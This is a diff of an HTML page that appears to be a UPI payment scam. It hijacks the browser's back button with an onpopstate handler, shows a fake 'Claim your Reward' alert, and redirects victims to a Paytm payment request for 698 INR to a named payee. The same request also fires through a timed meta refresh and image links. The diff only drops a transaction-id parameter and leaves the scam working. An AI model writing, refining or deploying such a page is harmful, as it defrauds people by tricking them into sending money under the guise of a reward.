--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
         onpopstate = function (t) {
           t.state && alert(' Claim your Reward by Clicking on \n "SEND IN BANK ACCOUNT"  ')
           location.href =
-            'paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tid=8000000&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR';
+            'paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR';
         }
       } catch (o) {}
     }();
@@ -40,7 +40,7 @@
 
 <body>
 
-  <a id="anc" href="paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tid=8000000&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR">
+  <a id="anc" href="paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR">
     <div>
       <img src="OP.jpg" width="100%" height="auto">
     </div>
@@ -86,14 +86,14 @@
   <font color="green">
 
     <br>
-    <a href="paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tid=8000000&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR">
+    <a href="paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR">
 
 
       <img src="YP.jpg" width="100%" height="auto">
     </a>
 
 
-    <meta http-equiv="refresh" content="7;url=paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tid=8000000&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR">
+    <meta http-equiv="refresh" content="7;url=paytmmp://pay?pa=shuugeez@freecharge&amp;pn=AshuEnterprise&amp;tr=698&amp;tn=orderSummary&amp;am=698&amp;cu=INR">
 
     <script>
       (function () {
